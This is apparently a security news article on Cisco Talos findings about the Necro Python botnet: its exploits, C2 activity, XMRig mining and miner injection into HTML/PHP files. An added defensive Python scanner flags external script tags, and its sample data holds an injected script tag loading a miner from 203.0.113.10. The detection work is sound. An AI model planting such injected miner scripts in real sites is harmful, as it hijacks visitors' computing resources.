In the latest malware developments, the Necro Python malware has been found to be gaining new malicious capabilities, making it a more serious threat.

Malicious Necro Python Malware:

Security researchers from Cisco Talos have newly published a report regarding their latest findings on the Necro Python Malware.

The malicious botnet has been under development since at least 2015, and its progress has been observed and documented by other security researchers such as Check Point Research and Netlab 360, which track it as FreakOut and Necro respectively.

Reportedly, the developers of the Necro Python malware have been working to increase the capabilities and versatility of the malware.

This includes exploits for more than 10 different web applications and for the SMB protocol, which the malware now uses to spread.

These exploits target vulnerabilities in software such as VMware vSphere, Vesta Control Panel, and SCO OpenServer.

A variant of the botnet that was deployed on May 18 also included exploits for EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0147).

Upgraded abilities and mal-operations of Necro Python:

In its deployment phase, the Necro Python malware first tries to exploit these vulnerabilities on both Linux and Windows systems.

If the botnet succeeds in exploiting a system, it then uses a JavaScript downloader, a Python interpreter and scripts, and executables created with PyInstaller.

The compromised system is subsequently used as a slave machine for the botnet.

Thereafter, Necro Python establishes a connection with its command and control server to maintain contact with the operator, receive commands, steal and exfiltrate data, or deploy additional malware payloads.

Reportedly, the newest addition to the malware is a crypto miner, XMRig, used to mine Monero (XMR) by consuming the slave machine's computing resources.

“The bot also injects the code to download and execute a JavaScript-based miner from an attacker-controlled server into HTML and PHP files on infected systems,” the researchers wrote. “If the user opens the infected application, a JavaScript-based Monero miner will run within their browser’s process space.”
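The injection into HTML and PHP files described above leaves a detectable trace on the web server: a script reference to a host the site does not normally load from. The following is an added example for defenders, not code from the Talos report or from the article, that walks a web root and flags `<script src>` tags pointing outside a host allowlist (and inline loaders that create script elements at runtime); the sample files and the 203.0.113.10 address are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Constructed samples (not real infected files): a clean page, and a PHP file carrying an
# injected <script> tag that pulls a miner from a host outside the site's allowlist.
SAMPLE_FILES = {
    "index.html": '<html><head><script src="/static/app.js"></script></head>'
                  '<body><script src="https://cdn.example.org/lib.js"></script></body></html>',
    "about.php": "<?php echo 'About'; ?>\n<script src='http://203.0.113.10/miner.js'></script>",
}

# src attribute of a <script> tag, single- or double-quoted.
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# Inline loaders that build a <script> element at runtime are a second common injection shape.
INLINE_LOADER_RE = re.compile(r'createElement\s*\(\s*["\']script["\']', re.IGNORECASE)

def suspicious_script_refs(text, allowed_hosts):
    """Script sources pointing at hosts outside allowed_hosts, plus inline loaders.
    Relative paths (no host) are treated as local and skipped."""
    hits = []
    for match in SCRIPT_SRC_RE.finditer(text):
        src = match.group(1).strip()
        host = urlparse(src).hostname  # None for relative paths such as /static/app.js
        if host and host.lower() not in allowed_hosts:
            hits.append("external-src:" + src)
    if INLINE_LOADER_RE.search(text):
        hits.append("inline-loader")
    return hits

def scan_webroot(root, allowed_hosts, exts=(".html", ".htm", ".php")):
    """Map each HTML/PHP file under root to its suspicious script references."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            refs = suspicious_script_refs(path.read_text(errors="replace"), allowed_hosts)
            if refs:
                findings[path.relative_to(root).as_posix()] = refs
    return findings

def demo():
    """Write the constructed samples to a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLE_FILES.items():
            Path(root, name).write_text(body)
        return scan_webroot(root, allowed_hosts={"cdn.example.org"})
```

Comparing the hits against a known-good baseline of the site's assets (or file hashes from the last deployment) turns this from a heuristic into a concrete integrity check.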

Other malicious capabilities of the Necro Python malware include launching denial-of-service (DoS) attacks, data exfiltration, and network sniffing.

A noteworthy new ability of the botnet observed by the researchers is that one of its modules lets the developers view code as an interpreter would see it before it is compiled to bytecode.

This module has also been integrated into an engine that may allow runtime modifications.

“Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,” says Cisco Talos. “This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.”